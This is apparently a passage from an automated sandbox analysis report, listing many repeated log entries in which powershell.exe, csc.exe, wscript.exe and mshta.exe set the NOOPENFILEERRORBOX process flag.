      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
